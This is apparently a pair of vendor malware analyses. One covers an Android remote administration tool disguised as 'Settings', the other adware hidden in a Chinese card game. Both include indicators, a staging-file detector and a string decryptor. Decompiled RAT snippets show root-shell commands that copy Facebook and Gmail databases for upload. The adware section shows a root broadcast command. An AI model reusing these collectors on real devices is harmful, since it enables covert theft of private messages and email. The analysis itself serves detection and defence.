Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of 8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

[Figure: package icon]

Upon execution, the app persuades the user to grant device administrator access in order to maintain persistence on the system:

[Figure: device administrator activation prompt]


The app runs itself as a service in the background:

[Figure: the app running as a background service]


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

[Figure: application list with two “Settings” entries; the second is the RAT]


The app is developed by “www.onespy.in” and signed with the following certificate:

[Figure: signing certificate]


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender
{
  // Copies a file as root ("su -c cp <src> <dst>"), which is how the app reaches other apps' private databases.
  private static boolean copyDB(String paramString1, String paramString2)
  {
    try
    {
      L.l("fb copy:" + paramString1 + ";" + paramString2);
      paramString1 = "cp " + paramString1 + " " + paramString2;
      int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
      return i == 0;
    }
    catch (Exception paramString1)
    {
      L.l(paramString1);
    }
    return false;
  }

  // Extracts the "name" field from a JSON-encoded sender column.
  private static String getName(String paramString)
  {
    try
    {
      paramString = new JSONObject(paramString).getString("name");
      return paramString;
    }
    catch (Exception paramString) {}
    return "";
  }

[…]

  private static void sendThreadsTable(Context paramContext)
  {
    if (Environment.getExternalStorageState().equals("mounted")) {
      localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
    }
    for (;;)
    {
      str = localObject + "/fbdb2.db";
      if (Environment.getExternalStorageState().equals("mounted"))
      {
        localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
        localObject = localObject + "/fb_chat.csv";
      }
      for (;;)
      {
        try
        {
          // Facebook's private message database is copied to external storage and then queried with SQLite.
          if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
          {
            L.l("fbdb copied");
            localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);
            localCursor = localSQLiteDatabase.rawQuery("SELECT sender, text, timestamp_ms FROM messages", null);
    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader
{
  private static final String dbnamePrefix = "gmldbcp_";

  private static String[] copyDB(Context paramContext)
  {
    Object localObject3;
    int i;
    int j;
    OutputStream localOutputStream;
    try
    {
      // Locates every Gmail mailstore database on the device through a root shell.
      localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
      Object localObject2 = new byte[660];
      localObject3 = new StringBuffer();
      for (;;)
      {
        i = ((InputStream)localObject1).read((byte[])localObject2);
        if (i == -1)
        {
          localObject2 = ((StringBuffer)localObject3).toString().split("\n");
          localObject3 = new String[localObject2.length];
          j = 0;
          Process localProcess = Runtime.getRuntime().exec("su");
          localOutputStream = localProcess.getOutputStream();
          int k = localObject2.length;
          i = 0;
          if (i < k) {
            break;
          }
         […]
    // Derives the copy name from the part of the mailstore file name before '@', then writes a "cp" command to the root shell.
    String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf('/') + 1, ((String)localObject1).lastIndexOf('@'));
    StringBuilder localStringBuilder = new StringBuilder("cp ").append((String)localObject1).append(" ");
    if (Environment.getExternalStorageState().equals("mounted")) {}
    for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())
    {
      localOutputStream.write(((String)localObject1 + "/" + "gmldbcp_" + str + ".db\n").getBytes());
      localObject3[j] = str;
      j += 1;
      i += 1;
      break;
    }
  }
      […]
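The collectors above stage copies of other apps' databases under fixed names (fbdb2.db, fb_chat.csv, gmldbcp_<name>.db) on external storage, or in the app's own files directory when no SD card is mounted, before uploading them. The following Python scanner is added here as an example (it is not part of the original analysis) and flags those staging artifacts in a directory listing; the listing it runs on is constructed.

```python
import re
from pathlib import PurePosixPath

# File names the RAT uses for staged copies, taken from the decompiled
# FBDBSender and GMailAppDBReader snippets. The Gmail name embeds the part of
# the mailstore file name before '@' (e.g. "mailstore.<account>").
STAGING_PATTERNS = {
    "facebook_threads_db": re.compile(r"^fbdb2\.db$"),
    "facebook_chat_export": re.compile(r"^fb_chat\.csv$"),
    "gmail_mailstore_copy": re.compile(r"^gmldbcp_(?P<account>.+)\.db$"),
}


def classify_path(path):
    """Return (collector, account_or_None) when the basename matches a known
    staging artifact, else None. Only the basename is matched because the RAT
    writes to external storage when mounted and to its own files dir otherwise."""
    name = PurePosixPath(path).name
    for collector, pattern in STAGING_PATTERNS.items():
        match = pattern.match(name)
        if match:
            return collector, match.groupdict().get("account")
    return None


def scan_listing(paths):
    """Scan an iterable of absolute paths (e.g. the output of
    `find /sdcard /data/data/com.path.call -type f`) and return
    (path, collector, account) tuples for every hit."""
    hits = []
    for path in paths:
        result = classify_path(path)
        if result is not None:
            hits.append((path, result[0], result[1]))
    return hits


# Constructed listing mimicking external storage plus the RAT's private
# directory on an infected device; the account names are made up.
SAMPLE_LISTING = [
    "/storage/emulated/0/DCIM/Camera/IMG_0001.jpg",
    "/storage/emulated/0/fbdb2.db",
    "/storage/emulated/0/fb_chat.csv",
    "/storage/emulated/0/gmldbcp_mailstore.victim.db",
    "/data/data/com.path.call/files/gmldbcp_mailstore.work.db",
    "/storage/emulated/0/Download/notes.csv",
]

if __name__ == "__main__":
    for path, collector, account in scan_listing(SAMPLE_LISTING):
        print(f"{collector:22s} {account or '-':20s} {path}")
```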


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the Linux system on an Android device:

public class ExecShell {
    public enum SHELL_CMD {
        public static final enum SHELL_CMD check_su_binary;

        static {
            // Runs "/system/xbin/which su" to check whether a su binary (root) is available.
            SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which",
                    "su"});
            SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};
        }

        private SHELL_CMD(String arg1, int arg2, String[] command) {
            super(arg1, arg2);
            this.command = command;
        }

        public static SHELL_CMD valueOf(String arg1) {
            return Enum.valueOf(SHELL_CMD.class, arg1);
        }

        public static SHELL_CMD[] values() {
            SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;
            int v1 = v0.length;
            SHELL_CMD[] v2 = new SHELL_CMD[v1];
            System.arraycopy(v0, 0, v2, 0, v1);
            return v2;
        }
    }

Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

A Collection of Ads Behind Your Favorite Game App With More Than 6 Million Downloads

– By Trustlook Research Team

A popular Chinese game with more than 6 million downloads secretly promotes other apps using a well-protected and widely used advertisement library.

Package name: com.xyz.ddz

Chinese App name: 欢乐逗地主

Download count: 6,000,000+

Icon: [Figure: app icon]

Trustlook has discovered a serious adware intrusion within one of the most popular game apps in China. Immediately after installation the app behaves normally: the user can play the game without restrictions or advertisements. After approximately 4 hours, various types of large full-screen pop-up advertisements (i.e. adware) are displayed, even when the app is not in use.

The app displays this adware by importing two ad libraries. These libraries are implemented with native methods, including the communication with the host app that is triggered by the ad. Both libraries are widely used, yet many anti-virus vendors are unable to detect them. All of the strings in these ad libraries are encrypted, and together the libraries use at least 8 methods to display ads, including:

  • To display the ad in the middle of the launcher
  • To display the installation notification (which can not be closed) in the middle of the launcher
  • To display the ad in the middle of the browser
  • To display the ad banner at the top of the browser
  • To display the ad banner at the bottom of the browser
  • To display the ad banner at the top of the input method
  • To display a floating ad banner with the Angry Bird icon
  • To create a promoted app icon in the launcher

One of the most popular implementations of this adware is an ad in the middle of the launcher. If you click the ad, then one of the following three APKs will be downloaded:

  • Qihoo mobile assistant APK (when you click the first Ad screen)
  • Qihoo browser APK (when you click the second Ad screen)
  • Jiuyou APK (when you click the third Ad screen)

[Figures: full-screen ads displayed over the launcher]

After the APK file has been downloaded, a pop-up window notifies you to install it. If you click the Cancel button, the same pop-up window is displayed every 30 minutes, or whenever you attempt to unlock your phone, asking whether you would like to install the APK. This pop-up has no “close” button or feature. It is a never-ending loop that creates a trap for the user.

[Figure: install prompt for the downloaded APK]

If you click the “Enter” button (which the app forces, since there is no other option to bypass the action), it will pop up this window:

[Figure: window shown after pressing “Enter”]

When you open a browser, such as Google Chrome, the ads are displayed at the top, bottom, or middle of the page. A message also shows up in the notification bar of your device.

[Figures: ads at the top, bottom and middle of a browser page]

Ad displayed in the notification bar:

[Figure: notification-bar ad]

Ad displayed in the browser:

[Figures: browser ads]

If you click the banner ad that is displayed on the bottom of a browser window, the following window containing three app icons will appear.

[Figure: pop-up window containing three app icons]

In addition to the pop-up ad displaying the three app icons, a floating banner icon, identical in appearance to the Angry Birds icon shown below, appears on your home screen.

[Figure: floating Angry Birds banner icon on the home screen]

If you click the Angry Birds icon, it will pop up a window with a list of apps, like this:

[Figures: app list shown after tapping the floating icon]

After the app has been installed for 5 hours, it creates a shortcut to the Qihoo mobile assistant on the launcher screen, whether or not you close the ad. Sometimes the ad pops up suddenly and erratically.

[Figures: shortcut to the Qihoo mobile assistant created on the launcher]

Unfortunately, this shortcut is not a real shortcut that points to the Qihoo mobile assistant app. Instead it points to the Qihoo mobile assistant APK file, which is located on the SD card at the path:

/sdcard/Download/oO_zziS7cMk=/uLRFttrgta+JdOk+ycQ/0Mdf4fxaQpU1MNb+F6O3YquZI+c=

The game did not install the Qihoo 360 app, but if you click this icon, it begins to install the Qihoo mobile assistant app.

[Figure: installation of the Qihoo mobile assistant starting from the shortcut]

After further analysis of this app, we discovered that the advertisement function is implemented in this module: com.xyz.ddz.gauxsw.

[Figure: package tree showing com.xyz.ddz.gauxsw]

Most strings are encrypted in the function of com.xyz.ddz.gauxsw.d.a.a.a():

[Figure: decompiled com.xyz.ddz.gauxsw.d.a.a.a()]

The encryption routine first decodes the string (the first parameter of this function) from base64, then XORs it with the bytes of the second parameter (“7b120431-5374-40d1-84d6-624980271ac8”):

[Figures: decompiled base64 decoding and XOR steps of the routine]

Trustlook created a tool to decrypt it, which revealed the following strings:

[Figures: decrypted strings]
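A reimplementation of that decryption routine in Python, added here as an example (it is neither Trustlook's tool nor the adware's own code): base64-decode the string, then XOR it with the key quoted above. It assumes the key is applied cyclically byte by byte, since the write-up does not say how the key is indexed, and the ciphertexts it runs on are constructed with the inverse of the same routine.

```python
import base64

# Key quoted in the analysis: second parameter of com.xyz.ddz.gauxsw.d.a.a.a().
XOR_KEY = b"7b120431-5374-40d1-84d6-624980271ac8"


def xor_with_key(data, key):
    """XOR data with the key repeated cyclically. Assumption: the decompiled
    routine indexes the key this way; the write-up only says the decoded bytes
    are XORed with every byte of the second parameter."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_string(encoded, key=XOR_KEY):
    """The adware's routine: base64-decode the string, then XOR with the key."""
    raw = base64.b64decode(encoded, validate=True)  # rejects non-base64 input
    return xor_with_key(raw, key).decode("utf-8")


def encrypt_string(plain, key=XOR_KEY):
    """Inverse of decrypt_string (XOR is symmetric); used only to build the
    constructed sample below."""
    return base64.b64encode(xor_with_key(plain.encode("utf-8"), key)).decode("ascii")


def decrypt_all(encoded_strings, key=XOR_KEY):
    """Decrypt a batch of extracted strings, keeping undecodable entries
    visible instead of aborting the whole run."""
    results = {}
    for enc in encoded_strings:
        try:
            results[enc] = decrypt_string(enc, key)
        except (ValueError, UnicodeDecodeError) as exc:  # binascii.Error is a ValueError
            results[enc] = "<undecodable: %s>" % exc
    return results


# Constructed sample: identifiers quoted in the write-up, obfuscated with the
# same routine so the decryptor has realistic input to work on.
SAMPLE_CIPHERTEXTS = [encrypt_string(s) for s in ("com.uu.action.wakeup", "daemon_exe")]

if __name__ == "__main__":
    for enc, dec in decrypt_all(SAMPLE_CIPHERTEXTS).items():
        print(enc, "->", dec)
```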

From the analysis we know that the ad is displayed by the com.yt.uulib and youtou.ad.api SDKs, which are two popular adware libraries.

These two ad libraries are able to display ads in two ways:

  • Floating banner
  • Fixed banner

We found that the app uses a self-protection function to protect itself and to evade anti-virus vendors. It runs 3 processes (it starts one first, which then forks into two more). When you kill any of them, it restarts and runs the 3 processes again:

[Figure: the three processes]

We also found that this app uses a native library to notify the main app to activate the native library file. It is named daemon_exe, is a .so file, and is placed in:

/data/data/com.xyz.ddz/files/jklm/VTcJhWmfUI6zvrYHQ0kO63_GpIHWtI2t/IL2msjinFbNh3jOA/RwR-jYJzNcY=/vR48I2IAv5GNfwRrMoe0zA==/daemon_exe

The main app checks whether the user's phone is rooted. If it is, the main app loads daemon_exe into the system as the root user:

[Figure: root check and loading of daemon_exe]

After analysing this native library file, we found that its main function is to communicate with the main app over a local TCP connection (127.0.0.1:5037, i.e. port 0x13AD) and then send it the broadcast that wakes it up and displays the ad.

[Figures: daemon_exe connecting to 127.0.0.1:5037]

After execution, the native library runs this command as the root user:

/system/bin/am broadcast -a com.uu.action.wakeup --es start_bc_send_id $ro.build.version.sdk(var)$ --include-stopped-packages --user 0

This command sends a broadcast whose action is com.uu.action.wakeup, carrying the string extra start_bc_send_id set to $ro.build.version.sdk(var)$, i.e. the phone's SDK version number, together with the --include-stopped-packages flag as a parameter.

From the manifest, we know that this broadcast could be received by com.xyz.ddz.gauxsw.a.e.a:

[Figure: manifest entry for the receiver com.xyz.ddz.gauxsw.a.e.a]

At the time of this release, the Trustlook Mobile Security app and Blue Frog Mobile Security app teams have detected the malicious behaviors of the sample being studied.